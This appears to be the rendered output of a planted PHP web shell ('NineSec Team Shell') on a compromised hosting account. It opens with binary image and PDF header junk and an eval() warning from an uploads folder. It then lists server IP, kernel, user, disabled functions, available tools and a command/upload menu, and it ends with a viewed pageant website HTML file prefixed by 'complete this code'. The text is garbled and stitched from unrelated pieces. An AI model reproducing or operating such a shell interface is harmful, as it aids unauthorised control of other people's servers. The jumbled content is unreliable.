JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90 C  %PDF-1.3 % 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream x\mo7 a?Hyi{$E(i?ckrAvEzFHI|H?{|Z|X|Ň77?Oݞ__lOя77wx'?Ű8I] gQB2za]l|ɇ՟?} " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress
Warning: file_get_contents(test.txt): Failed to open stream: No such file or directory in /home/u178500310/domains/princess.uaeclick.com/public_html/uploads/1770357389_0_197006009.php(44) : eval()'d code on line 6
NineSec Team Shell
NineSec Team Shell
Server IP : 82.25.113.252  /  Your IP : 216.73.216.172
Web Server : LiteSpeed
System : Linux fr-int-web2058.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
User : u178500310 ( 178500310)
PHP Version : 8.2.29
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u178500310/domains/pinkrosesentertainment.com/public_html/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : /home/u178500310/domains/pinkrosesentertainment.com/public_html/indetry.html
complete this code <!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Miss & Mrs. India Registrations 2025 | Tiska Beauty Pageant</title>
    <link rel="shortcut icon" href="assets/images/icn-logo.png" type="image/x-icon">
    
    <!-- Google Fonts -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600;700&display=swap" rel="stylesheet">
    
    <!-- Font Awesome -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
    
    <style>
        :root {
            --primary-color: #e83e8c;
            --secondary-color: #6c757d;
            --dark-color: #1a1a2e;
            --light-color: #f8f9fa;
            --accent-color: #ffc107;
            --text-color: #333;
            --text-light: #f8f9fa;
            --transition: all 0.3s ease;
            --box-shadow: 0 5px 15px rgba(0, 0, 0, 0.1);
            --section-padding: 80px 0;
        }
        
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        
        body {
            font-family: 'Poppins', sans-serif;
            color: var(--text-color);
            line-height: 1.6;
            background-color: var(--light-color);
            overflow-x: hidden;
        }
        
        /* Typography */
        h1, h2, h3, h4, h5, h6 {
            font-weight: 700;
            line-height: 1.2;
            margin-bottom: 1rem;
        }
        
        h1 {
            font-size: 2.5rem;
        }
        
        h2 {
            font-size: 2rem;
        }
        
        h3 {
            font-size: 1.75rem;
        }
        
        p {
            margin-bottom: 1.5rem;
        }
        
        a {
            text-decoration: none;
            color: var(--primary-color);
            transition: var(--transition);
        }
        
        a:hover {
            color: var(--dark-color);
        }
        
        .text-primary {
            color: var(--primary-color) !important;
        }
        
        .text-center {
            text-align: center;
        }
        
        .uppercase {
            text-transform: uppercase;
        }
        
        /* Buttons */
        .btn {
            display: inline-block;
            padding: 12px 30px;
            border-radius: 50px;
            font-weight: 600;
            text-transform: uppercase;
            letter-spacing: 1px;
            transition: var(--transition);
            border: none;
            cursor: pointer;
        }
        
        .btn-primary {
            background-color: var(--primary-color);
            color: white;
        }
        
        .btn-primary:hover {
            background-color: #d62e7c;
            color: white;
            transform: translateY(-3px);
            box-shadow: var(--box-shadow);
        }
        
        .btn-outline {
            background-color: transparent;
            border: 2px solid var(--primary-color);
            color: var(--primary-color);
        }
        
        .btn-outline:hover {
            background-color: var(--primary-color);
            color: white;
        }
        
        /* Layout */
        .container {
            width: 100%;
            max-width: 1200px;
            margin: 0 auto;
            padding: 0 20px;
        }
        
        section {
            padding: var(--section-padding);
        }
        
        .section-title {
            margin-bottom: 50px;
            position: relative;
        }
        
        .section-title h2 {
            display: inline-block;
            position: relative;
            padding-bottom: 15px;
        }
        
        .section-title h2::after {
            content: '';
            position: absolute;
            bottom: 0;
            left: 50%;
            transform: translateX(-50%);
            width: 80px;
            height: 3px;
            background-color: var(--primary-color);
        }
        
        /* Header */
        header {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            z-index: 1000;
            background-color: rgba(26, 26, 46, 0.9);
            backdrop-filter: blur(10px);
            transition: var(--transition);
            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
        }
        
        header.scrolled {
            background-color: rgba(26, 26, 46, 0.95);
            box-shadow: 0 5px 20px rgba(0, 0, 0, 0.2);
        }
        
        .navbar {
            display: flex;
            justify-content: space-between;
            align-items: center;
            padding: 20px 0;
        }
        
        .logo {
            display: flex;
            align-items: center;
        }
        
        .logo img {
            height: 50px;
            margin-right: 10px;
        }
        
        .logo h1 {
            color: white;
            font-size: 1.5rem;
            margin: 0;
        }
        
        .nav-links {
            display: flex;
            list-style: none;
        }
        
        .nav-links li {
            margin-left: 30px;
        }
        
        .nav-links a {
            color: white;
            font-weight: 500;
            position: relative;
            padding: 5px 0;
        }
        
        .nav-links a::after {
            content: '';
            position: absolute;
            bottom: 0;
            left: 0;
            width: 0;
            height: 2px;
            background-color: var(--primary-color);
            transition: var(--transition);
        }
        
        .nav-links a:hover::after {
            width: 100%;
        }
        
        .nav-links a.active {
            color: var(--primary-color);
        }
        
        .hamburger {
            display: none;
            cursor: pointer;
        }
        
        .hamburger div {
            width: 25px;
            height: 3px;
            background-color: white;
            margin: 5px;
            transition: var(--transition);
        }
        
        /* Hero Section */
        .hero {
            height: 100vh;
            min-height: 700px;
            background: linear-gradient(rgba(26, 26, 46, 0.7), rgba(26, 26, 46, 0.7)), url('assets/images/sliider/slider1.webp') no-repeat center center/cover;
            display: flex;
            align-items: center;
            color: white;
            text-align: center;
            position: relative;
            overflow: hidden;
        }
        
        .hero-content {
            max-width: 800px;
            margin: 0 auto;
            position: relative;
            z-index: 1;
        }
        
        .hero h1 {
            font-size: 3.5rem;
            margin-bottom: 20px;
            animation: fadeInDown 1s ease;
        }
        
        .hero p {
            font-size: 1.2rem;
            margin-bottom: 30px;
            animation: fadeInUp 1s ease;
        }
        
        .hero-btns {
            display: flex;
            justify-content: center;
            gap: 20px;
            animation: fadeIn 1.5s ease;
        }
        
        /* About Section */
        .about {
            background-color: white;
        }
        
        .about-content {
            display: flex;
            align-items: center;
            gap: 50px;
        }
        
        .about-img {
            flex: 1;
            border-radius: 10px;
            overflow: hidden;
            box-shadow: var(--box-shadow);
        }
        
        .about-img img {
            width: 100%;
            height: auto;
            display: block;
            transition: var(--transition);
        }
        
        .about-img:hover img {
            transform: scale(1.05);
        }
        
        .about-text {
            flex: 1;
        }
        
        /* Winners Section */
        .winners {
            background-color: #f8f9fa;
        }
        
        .winners-grid {
            display: grid;
            grid-template-columns: repeat(auto-fill, minmax(300px, 1fr));
            gap: 30px;
        }
        
        .winner-card {
            background-color: white;
            border-radius: 10px;
            overflow: hidden;
            box-shadow: var(--box-shadow);
            transition: var(--transition);
        }
        
        .winner-card:hover {
            transform: translateY(-10px);
        }
        
        .winner-img {
            height: 350px;
            overflow: hidden;
        }
        
        .winner-img img {
            width: 100%;
            height: 100%;
            object-fit: cover;
            transition: var(--transition);
        }
        
        .winner-card:hover .winner-img img {
            transform: scale(1.1);
        }
        
        .winner-info {
            padding: 20px;
            text-align: center;
        }
        
        .winner-info h3 {
            color: var(--primary-color);
        }
        
        /* Gallery Section */
        .gallery {
            background-color: white;
        }
        
        .gallery-grid {
            display: grid;
            grid-template-columns: repeat(auto-fill, minmax(250px, 1fr));
            gap: 20px;
        }
        
        .gallery-item {
            position: relative;
            border-radius: 10px;
            overflow: hidden;
            height: 250px;
            box-shadow: var(--box-shadow);
        }
        
        .gallery-item img {
            width: 100%;
            height: 100%;
            object-fit: cover;
            transition: var(--transition);
        }
        
        .gallery-item:hover img {
            transform: scale(1.1);
        }
        
        .gallery-overlay {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(232, 62, 140, 0.8);
            display: flex;
            align-items: center;
            justify-content: center;
            opacity: 0;
            transition: var(--transition);
        }
        
        .gallery-item:hover .gallery-overlay {
            opacity: 1;
        }
        
        .gallery-overlay i {
            color: white;
            font-size: 2rem;
        }
        
        /* Jury Section */
        .jury {
            background-color: #f8f9fa;
        }
        
        .jury-slider {
            display: flex;
            gap: 30px;
            overflow-x: auto;
            padding-bottom: 20px;
            scroll-snap-type: x mandatory;
        }
        
        .jury-slider::-webkit-scrollbar {
            height: 8px;
        }
        
        .jury-slider::-webkit-scrollbar-track {
            background: #f1f1f1;
            border-radius: 10px;
        }
        
        .jury-slider::-webkit-scrollbar-thumb {
            background: var(--primary-color);
            border-radius: 10px;
        }
        
        .jury-member {
            min-width: 300px;
            background-color: white;
            border-radius: 10px;
            overflow: hidden;
            box-shadow: var(--box-shadow);
            scroll-snap-align: start;
        }
        
        .jury-img {
            height: 300px;
            overflow: hidden;
        }
        
        .jury-img img {
            width: 100%;
            height: 100%;
            object-fit: cover;
        }
        
        .jury-info {
            padding: 20px;
            text-align: center;
        }
        
        .jury-info h3 {
            color: var(--primary-color);
        }
        
        /* Event Schedule */
        .schedule {
            background-color: white;
        }
        
        .schedule-tabs {
            display: flex;
            justify-content: center;
            margin-bottom: 30px;
            flex-wrap: wrap;
        }
        
        .tab-btn {
            padding: 10px 20px;
            background-color: transparent;
            border: none;
            border-bottom: 3px solid transparent;
            font-weight: 600;
            cursor: pointer;
            transition: var(--transition);
        }
        
        .tab-btn.active {
            color: var(--primary-color);
            border-bottom-color: var(--primary-color);
        }
        
        .tab-content {
            display: none;
        }
        
        .tab-content.active {
            display: block;
            animation: fadeIn 0.5s ease;
        }
        
        .schedule-item {
            background-color: #f8f9fa;
            border-radius: 10px;
            padding: 20px;
            margin-bottom: 15px;
            display: flex;
            align-items: center;
        }
        
        .schedule-item i {
            color: var(--primary-color);
            font-size: 1.5rem;
            margin-right: 15px;
        }
        
        /* Sponsors Section */
        .sponsors {
            background-color: #f8f9fa;
        }
        
        .sponsors-grid {
            display: grid;
            grid-template-columns: repeat(auto-fill, minmax(150px, 1fr));
            gap: 30px;
            align-items: center;
        }
        
        .sponsor-logo {
            height: 80px;
            display: flex;
            align-items: center;
            justify-content: center;
            padding: 15px;
            background-color: white;
            border-radius: 10px;
            box-shadow: var(--box-shadow);
            transition: var(--transition);
        }
        
        .sponsor-logo:hover {
            transform: translateY(-5px);
        }
        
        .sponsor-logo img {
            max-width: 100%;
            max-height: 100%;
            filter: grayscale(100%);
            transition: var(--transition);
        }
        
        .sponsor-logo:hover img {
            filter: grayscale(0);
        }
        
        /* Contact Section */
        .contact {
            background-color: white;
        }
        
        .contact-container {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(300px, 1fr));
            gap: 50px;
        }
        
        .contact-info h3 {
            color: var(--primary-color);
            margin-bottom: 20px;
        }
        
        .contact-details {
            margin-bottom: 30px;
        }
        
        .contact-item {
            display: flex;
            align-items: flex-start;
            margin-bottom: 15px;
        }
        
        .contact-item i {
            color: var(--primary-color);
            font-size: 1.2rem;
            margin-right: 15px;
            margin-top: 5px;
        }
        
        .social-links {
            display: flex;
            gap: 15px;
        }
        
        .social-links a {
            display: flex;
            align-items: center;
            justify-content: center;
            width: 40px;
            height: 40px;
            border-radius: 50%;
            background-color: var(--primary-color);
            color: white;
            transition: var(--transition);
        }
        
        .social-links a:hover {
            background-color: var(--dark-color);
            transform: translateY(-3px);
        }
        
        .contact-form .form-group {
            margin-bottom: 20px;
        }
        
        .contact-form input,
        .contact-form textarea {
            width: 100%;
            padding: 12px 15px;
            border: 1px solid #ddd;
            border-radius: 5px;
            font-family: 'Poppins', sans-serif;
            transition: var(--transition);
        }
        
        .contact-form input:focus,
        .contact-form textarea:focus {
            border-color: var(--primary-color);
            outline: none;
            box-shadow: 0 0 0 3px rgba(232, 62, 140, 0.2);
        }
        
        .contact-form textarea {
            min-height: 150px;
            resize: vertical;
        }
        
        /* Footer */
        footer {
            background-color: var(--dark-color);
            color: white;
            padding: 60px 0 20px;
        }
        
        .footer-container {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(250px, 1fr));
            gap: 40px;
            margin-bottom: 40px;
        }
        
        .footer-col h3 {
            color: white;
            margin-bottom: 20px;
            position: relative;
            padding-bottom: 10px;
        }
        
        .footer-col h3::after {
            content: '';
            position: absolute;
            bottom: 0;
            left: 0;
            width: 50px;
            height: 2px;
            background-color: var(--primary-color);
        }
        
        .footer-col p {
            color: rgba(255, 255, 255, 0.7);
        }
        
        .footer-links {
            list-style: none;
        }
        
        .footer-links li {
            margin-bottom: 10px;
        }
        
        .footer-links a {
            color: rgba(255, 255, 255, 0.7);
            transition: var(--transition);
            display: inline-block;
        }
        
        .footer-links a:hover {
            color: var(--primary-color);
            transform: translateX(5px);
        }
        
        .footer-bottom {
            text-align: center;
            padding-top: 20px;
            border-top: 1px solid rgba(255, 255, 255, 0.1);
            color: rgba(255, 255, 255, 0.7);
            font-size: 0.9rem;
        }
        
        /* Back to top button */
        .back-to-top {
            position: fixed;
            bottom: 30px;
            right: 30px;
            width: 50px;
            height: 50px;
            background-color: var(--primary-color);
            color: white;
            border-radius: 50%;
            display: flex;
            align-items: center;
            justify-content: center;
            font-size: 1.2rem;
            opacity: 0;
            visibility: hidden;
            transition: var(--transition);
            z-index: 999;
        }
        
        .back-to-top.active {
            opacity: 1;
            visibility: visible;
        }
        
        .back-to-top:hover {
            background-color: var(--dark-color);
            transform: translateY(-5px);
        }
        
        /* Animations */
        @keyframes fadeIn {
            from { opacity: 0; }
            to { opacity: 1; }
        }
        
        @keyframes fadeInDown {
            from {
                opacity: 0;
                transform: translateY(-30px);
            }
            to {
                opacity: 1;
                transform: translateY(0);
            }
        }
        
        @keyframes fadeInUp {
            from {
                opacity: 0;
                transform: translateY(30px);
            }
            to {
                opacity: 1;
                transform: translateY(0);
            }
        }
        
        /* Responsive Styles */
        @media (max-width: 992px) {
            .about-content {
                flex-direction: column;
            }
            
            .about-img, .about-text {
                flex: none;
                width: 100%;
            }
            
            .hero h1 {
                font-size: 2.8rem;
            }
        }
        
        @media (max-width: 768px) {
            .hamburger {
                display: block;
            }
            
            .nav-links {
                position: fixed;
                top: 80px;
                left: -100%;
                width: 100%;
                height: calc(100vh - 80px);
                background-color: var(--dark-color);
                flex-direction: column;
                align-items: center;
                justify-content: center;
                transition: var(--transition);
                z-index: 999;
            }
            
            .nav-links.active {
                left: 0;
            }
            
            .nav-links li {
                margin: 15px 0;
            }
            
            .hero h1 {
                font-size: 2.5rem;
            }
            
            .hero-btns {
                flex-direction: column;
                gap: 15px;
            }
            
            .btn {
                width: 100%;
            }
            
            .section-title h2 {
                font-size: 1.8rem;
            }
        }
        
        @media (max-width: 576px) {
            section {
                padding: 60px 0;
            }
            
            .hero h1 {
                font-size: 2rem;
            }
            
            .hero p {
                font-size: 1rem;
            }
            
            .section-title h2 {
                font-size: 1.5rem;
            }
        }
        
        /* Utility Classes */
        .mt-1 { margin-top: 10px; }
        .mt-2 { margin-top: 20px; }
        .mt-3 { margin-top: 30px; }
        .mt-4 { margin-top: 40px; }
        .mt-5 { margin-top: 50px; }
        
        .mb-1 { margin-bottom: 10px; }
        .mb-2 { margin-bottom: 20px; }
        .mb-3 { margin-bottom: 30px; }
        .mb-4 { margin-bottom: 40px; }
        .mb-5 { margin-bottom: 50px; }
        
        .py-1 { padding-top: 10px; padding-bottom: 10px; }
        .py-2 { padding-top: 20px; padding-bottom: 20px; }
        .py-3 { padding-top: 30px; padding-bottom: 30px; }
        .py-4 { padding-top: 40px; padding-bottom: 40px; }
        .py-5 { padding-top: 50px; padding-bottom: 50px; }
        
        .text-white { color: white; }
        .bg-dark { background-color: var(--dark-color); }
        .bg-light { background-color: var(--light-color); }
        .bg-primary { background-color: var(--primary-color); }
    </style>
</head>
<body>
    <!-- Header -->
    <header id="header">
        <div class="container">
            <nav class="navbar">
                <div class="logo">
                    <img src="assets/images/logo.png" alt="Tiska Pageants">
                    <h1>Tiska Pageants</h1>
                </div>
                
                <ul class="nav-links">
                    <li><a href="#home" class="active">Home</a></li>
                    <li><a href="#about">About</a></li>
                    <li><a href="#winners">Winners</a></li>
                    <li><a href="#gallery">Gallery</a></li>
                    <li><a href="#jury">Jury</a></li>
                    <li><a href="#schedule">Schedule</a></li>
                    <li><a href="#contact">Contact</a></li>
                    <li><a href="registration.php" class="btn btn-outline">Register Now</a></li>
                </ul>
                
                <div class="hamburger">
                    <div class="line1"></div>
                    <div class="line2"></div>
                    <div class="line3"></div>
                </div>
            </nav>
        </div>
    </header>

    <!-- Hero Section -->
    <section class="hero" id="home">
        <div class="container">
            <div class="hero-content">
                <h1 class="text-white">Tiska Miss & Mrs. India 2025</h1>
                <p class="text-white">India's most prestigious beauty pageant celebrating elegance, talent, and empowerment</p>
                <div class="hero-btns">
                    <a href="registration.php" class="btn btn-primary">Register Now</a>
                    <a href="#about" class="btn btn-outline">Learn More</a>
                </div>
            </div>
        </div>
    </section>

    <!-- About Section -->
    <section class="about" id="about">
        <div class="container">
            <div class="section-title">
                <h2>About The Pageant</h2>
            </div>
            
            <div class="about-content">
                <div class="about-img">
                    <img src="assets/images/about-pageant.webp" alt="About Tiska Pageant">
                </div>
                <div class="about-text">
                    <h3>India's Most Prestigious Beauty Pageant</h3>
                    <p>The <span class="text-primary">'Tiska Miss & Mrs. India'</span> Pageant is the National Pride and Treasure of India. This pageant holds the most respectable title in India for All Women. It identifies women who exemplify Beauty, Talent, Intelligence, and Compassion.</p>
                    <p>After a Huge Success of Season-4, Tiska Miss & Mrs. India 2023, we are back with Season-5 of Tiska Miss & Mrs. India 2025.</p>
                    <p>Tiska Miss & Mrs. India is a unique blend of glamour and elegance, unlike traditional pageantry. The event is available on both state and national levels. We organize an annual pageant in different categories to identify Ms. & Mrs. India who exemplify Beauty, Talent, Intelligence, and Compassion.</p>
                    <a href="about-us.html" class="btn btn-primary mt-3">Read More</a>
                </div>
            </div>
        </div>
    </section>

    <!-- Winners Section -->
    <section class="winners" id="winners">
        <div class="container">
            <div class="section-title">
                <h2>Our Winners 2023</h2>
            </div>
            
            <div class="winners-grid">
                <!-- Winner 1 -->
                <div class="winner-card">
                    <div class="winner-img">
                        <img src="assets/images/season4/1.webp" alt="Winner 2023">
                    </div>
                    <div class="winner-info">
                        <h3>Winner Name</h3>
                        <p>Miss India 2023</p>
                    </div>
                </div>
                
                <!-- Winner 2 -->
                <div class="winner-card">
                    <div class="winner-img">
                        <img src="assets/images/season4/2.webp" alt="Winner 2023">
                    </div>
                    <div class="winner-info">
                        <h3>Winner Name</h3>
                        <p>Mrs India 2023</p>
                    </div>
                </div>
                
                <!-- Winner 3 -->
                <div class="winner-card">
                    <div class="winner-img">
                        <img src="assets/images/season4/3.webp" alt="Winner 2023">
                    </div>
                    <div class="winner-info">
                        <h3>Winner Name</h3>
                        <p>Runner Up 2023</p>
                    </div>
                </div>
            </div>
            
            <div class="text-center mt-5">
                <a href="gallery-season-4.html" class="btn btn-outline">View All Winners</a>
            </div>
        </div>
    </section>

    <!-- Gallery Section -->
    <section class="gallery" id="gallery">
        <div class="container">
            <div class="section-title">
                <h2>Glimpse of Season 4</h2>
            </div>
            
            <div class="gallery-grid">
                <!-- Gallery Item 1 -->
                <div class="gallery-item">
                    <img src="assets/images/season4/home-gallery/1.webp" alt="Event Photo">
                    <div class="gallery-overlay">
                        <i class="fas fa-search-plus"></i>
                    </div>
                </div>
                
                <!-- Gallery Item 2 -->
                <div class="gallery-item">
                    <img src="assets/images/season4/home-gallery/2.webp" alt="Event Photo">
                    <div class="gallery-overlay">
                        <i class="fas fa-search-plus"></i>
                    </div>
                </div>
                
                <!-- Gallery Item 3 -->
                <div class="gallery-item">
                    <img src="assets/images/season4/home-gallery/3.webp" alt="Event Photo">
                    <div class="gallery-overlay">
                        <i class="fas fa-search-plus"></i>
                    </div>
                </div>
                
                <!-- Gallery Item 4 -->
                <div class="gallery-item">
                    <img src="assets/images/season4/home-gallery/4.webp" alt="Event Photo">
                    <div class="gallery-overlay">
                        <i class="fas fa-search-plus"></i>
                    </div>
                </div>
                
                <!-- Gallery Item 5 -->
                <div class="gallery-item">
                    <img src="assets/images/season4/home-gallery/5.webp" alt="Event Photo">
                    <div class="gallery-overlay">
                        <i class="fas fa-search-plus"></i>
                    </div>
                </div>
                
                <!-- Gallery Item 6 -->
                <div class="gallery-item">
                    <img src="assets/images/season4/home-gallery/6.webp" alt="Event Photo">
                    <div class="gallery-overlay">
                        <i class="fas fa-search-plus"></i>
                    </div>
                </div>
            </div>
            
            <div class="text-center mt-5">
                <a href="nwGallery.php" class="btn btn-primary">View Full Gallery</a>
            </div>
        </div>
    </section>

    <!-- Jury Section -->
    <section class="jury" id="jury">
        <div class="container">
            <div class="section-title">
                <h2>Our Esteemed Jury</h2>
            </div>
            
            <div class="jury-slider">
                <!-- Jury Member 1 -->
                <div class="jury-member">
                    <div class="jury-img">
                        <img src="assets/images/jury/aditinew.jpg" alt="Dr. Aditi Govitrikar">
                    </div>
                    <div class="jury-info">
                        <h3>Dr. Aditi Govitrikar</h3>
                        <p>Former Mrs. World & Actress</p>
                        <p class="text-muted">The first and only Indian woman to win the Mrs. World title in 2001</p>
                    </div>
                </div>
                
                <!-- Jury Member 2 -->
                <div class="jury-member">
                    <div class="jury-img">
                        <img src="assets/images/jury/Shweta.jpg" alt="Shweta Sharda">
                    </div>
                    <div class="jury-info">
                        <h3>Shweta Sharda</h3>
                        <p>Miss Universe India</p>
                        <p class="text-muted">Represented India at Miss Universe 2023</p>
                    </div>
                </div>
                
                <!-- Jury Member 3 -->
                <div class="jury-member">
                    <div class="jury-img">
                        <img src="assets/images/jury/SHIKHA.webp" alt="SHIKHA SHARMA">
                    </div>
                    <div class="jury-info">
                        <h3>SHIKHA SHARMA</h3>
                        <p>Director Kanti Lab Services Pvt. Ltd</p>
                    </div>
                </div>
                
                <!-- Jury Member 4 -->
                <div class="jury-member">
                    <div class="jury-img">
                        <img src="assets/images/jury/Payal.webp" alt="Payal Singh">
                    </div>
                    <div class="jury-info">
                        <h3>Payal Singh</h3>
                        <p>Advisory</p>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <!-- Event Schedule Section -->
    <section class="schedule" id="schedule">
        <div class="container">
            <div class="section-title">
                <h2>Event Schedule</h2>
            </div>
            
            <div class="schedule-tabs">
                <button class="tab-btn active" data-tab="day1">Day 1</button>
                <button class="tab-btn" data-tab="day2">Day 2</button>
                <button class="tab-btn" data-tab="day3">Day 3</button>
                <button class="tab-btn" data-tab="day4">Day 4</button>
                <button class="tab-btn" data-tab="day5">Day 5</button>
            </div>
            
            <div class="tab-content active" id="day1">
                <div class="schedule-item">
                    <i class="fas fa-star"></i>
                    <div>
                        <h4>Welcome & Introduction Session</h4>
                        <p>Morning session to welcome all participants</p>
                    </div>
                </div>
                
                <div class="schedule-item">
                    <i class="fas fa-star"></i>
                    <div>
                        <h4>Grooming Session</h4>
                        <p>Professional grooming for all contestants</p>
                    </div>
                </div>
                
                <div class="schedule-item">
                    <i class="fas fa-star"></i>
                    <div>
                        <h4>Orientation & Press Conference</h4>
                        <p>Evening session with media</p>
                    </div>
                </div>
            </div>
            
            <div class="tab-content" id="day2">
                <div class="schedule-item">
                    <i class="fas fa-star"></i>
                    <div>
                        <h4>Fitness Session & Mrs. Fit Contest</h4>
                        <p>Morning fitness activities</p>
                    </div>
                </div>
                
                <div class="schedule-item">
                    <i class="fas fa-star"></i>
                    <div>
                        <h4>Makeover for Portfolio Shoot</h4>
                        <p>Professional makeovers for photo sessions</p>
                    </div>
                </div>
                
                <div class="schedule-item">
                    <i class="fas fa-star"></i>
                    <div>
                        <h4>Photoshoot</h4>
                        <p>Afternoon portfolio shoot</p>
                    </div>
                </div>
            </div>
            
            <!-- Additional days would follow the same pattern -->
        </div>
    </section>

    <!-- Venue Section -->
    <section class="venue bg-light">
        <div class="container">
            <div class="section-title">
                <h2>Our Venue</h2>
            </div>
            
            <div class="about-content">
                <div class="about-text">
                    <h3>The Leela Ambience Convention Hotel, Delhi</h3>
                    <p>Experience luxury and elegance at our prestigious venue for Tiska Miss & Mrs. India 2025. The Leela Ambience Convention Hotel offers world-class facilities and the perfect backdrop for this grand event.</p>
                    <div class="venue-features">
                        <div class="schedule-item">
                            <i class="fas fa-map-marker-alt"></i>
                            <div>
                                <h4>Location</h4>
                                <p>Yamuna Sports Complex, Delhi</p>
                            </div>
                        </div>
                        
                        <div class="schedule-item">
                            <i class="fas fa-hotel"></i>
                            <div>
                                <h4>Accommodation</h4>
                                <p>Luxury rooms for all participants</p>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="about-img">
                    <img src="assets/images/venue/hotel1.webp" alt="The Leela Ambience Convention Hotel">
                </div>
            </div>
        </div>
    </section>

    <!-- Sponsors Section -->
    <section class="sponsors" id="sponsors">
        <div class="container">
                        <div class="section-title">
                <h2>Our Sponsors</h2>
                <p>We are proud to be associated with these prestigious brands</p>
            </div>
            
            <div class="sponsors-grid">
                <!-- Sponsor 1 -->
                <div class="sponsor-logo">
                    <img src="assets/images/sponsors/sponsor1.png" alt="Sponsor Logo">
                </div>
                
                <!-- Sponsor 2 -->
                <div class="sponsor-logo">
                    <img src="assets/images/sponsors/sponsor2.png" alt="Sponsor Logo">
                </div>
                
                <!-- Sponsor 3 -->
                <div class="sponsor-logo">
                    <img src="assets/images/sponsors/sponsor3.png" alt="Sponsor Logo">
                </div>
                
                <!-- Sponsor 4 -->
                <div class="sponsor-logo">
                    <img src="assets/images/sponsors/sponsor4.png" alt="Sponsor Logo">
                </div>
                
                <!-- Sponsor 5 -->
                <div class="sponsor-logo">
                    <img src="assets/images/sponsors/sponsor5.png" alt="Sponsor Logo">
                </div>
                
                <!-- Sponsor 6 -->
                <div class="sponsor-logo">
                    <img src="assets/images/sponsors/sponsor6.png" alt="Sponsor Logo">
                </div>
            </div>
            
            <div class="text-center mt-5">
                <a href="become-sponsor.html" class="btn btn-outline">Become a Sponsor</a>
            </div>
        </div>
    </section>

    <!-- Contact Section -->
    <section class="contact" id="contact">
        <div class="container">
            <div class="section-title">
                <h2>Contact Us</h2>
                <p>Have questions? Get in touch with our team</p>
            </div>
            
            <div class="contact-container">
                <div class="contact-info">
                    <h3>Contact Information</h3>
                    <div class="contact-details">
                        <div class="contact-item">
                            <i class="fas fa-map-marker-alt"></i>
                            <div>
                                <h4>Address</h4>
                                <p>123 Pageant Avenue, New Delhi, India 110001</p>
                            </div>
                        </div>
                        
                        <div class="contact-item">
                            <i class="fas fa-phone-alt"></i>
                            <div>
                                <h4>Phone</h4>
                                <p>+91 98765 43210</p>
                            </div>
                        </div>
                        
                        <div class="contact-item">
                            <i class="fas fa-envelope"></i>
                            <div>
                                <h4>Email</h4>
                                <p>info@tiskapageants.com</p>
                            </div>
                        </div>
                    </div>
                    
                    <h3>Follow Us</h3>
                    <div class="social-links">
                        <a href="#"><i class="fab fa-facebook-f"></i></a>
                        <a href="#"><i class="fab fa-instagram"></i></a>
                        <a href="#"><i class="fab fa-twitter"></i></a>
                        <a href="#"><i class="fab fa-youtube"></i></a>
                    </div>
                </div>
                
                <div class="contact-form">
                    <form id="contactForm">
                        <div class="form-group">
                            <input type="text" placeholder="Your Name" required>
                        </div>
                        
                        <div class="form-group">
                            <input type="email" placeholder="Your Email" required>
                        </div>
                        
                        <div class="form-group">
                            <input type="tel" placeholder="Your Phone">
                        </div>
                        
                        <div class="form-group">
                            <textarea placeholder="Your Message" required></textarea>
                        </div>
                        
                        <button type="submit" class="btn btn-primary">Send Message</button>
                    </form>
                </div>
            </div>
        </div>
    </section>

    <!-- Footer -->
    <footer>
        <div class="container">
            <div class="footer-container">
                <div class="footer-col">
                    <h3>About Tiska</h3>
                    <p>Tiska Miss & Mrs. India is India's most prestigious beauty pageant celebrating elegance, talent, and empowerment of women across the nation.</p>
                    <div class="social-links mt-3">
                        <a href="#"><i class="fab fa-facebook-f"></i></a>
                        <a href="#"><i class="fab fa-instagram"></i></a>
                        <a href="#"><i class="fab fa-twitter"></i></a>
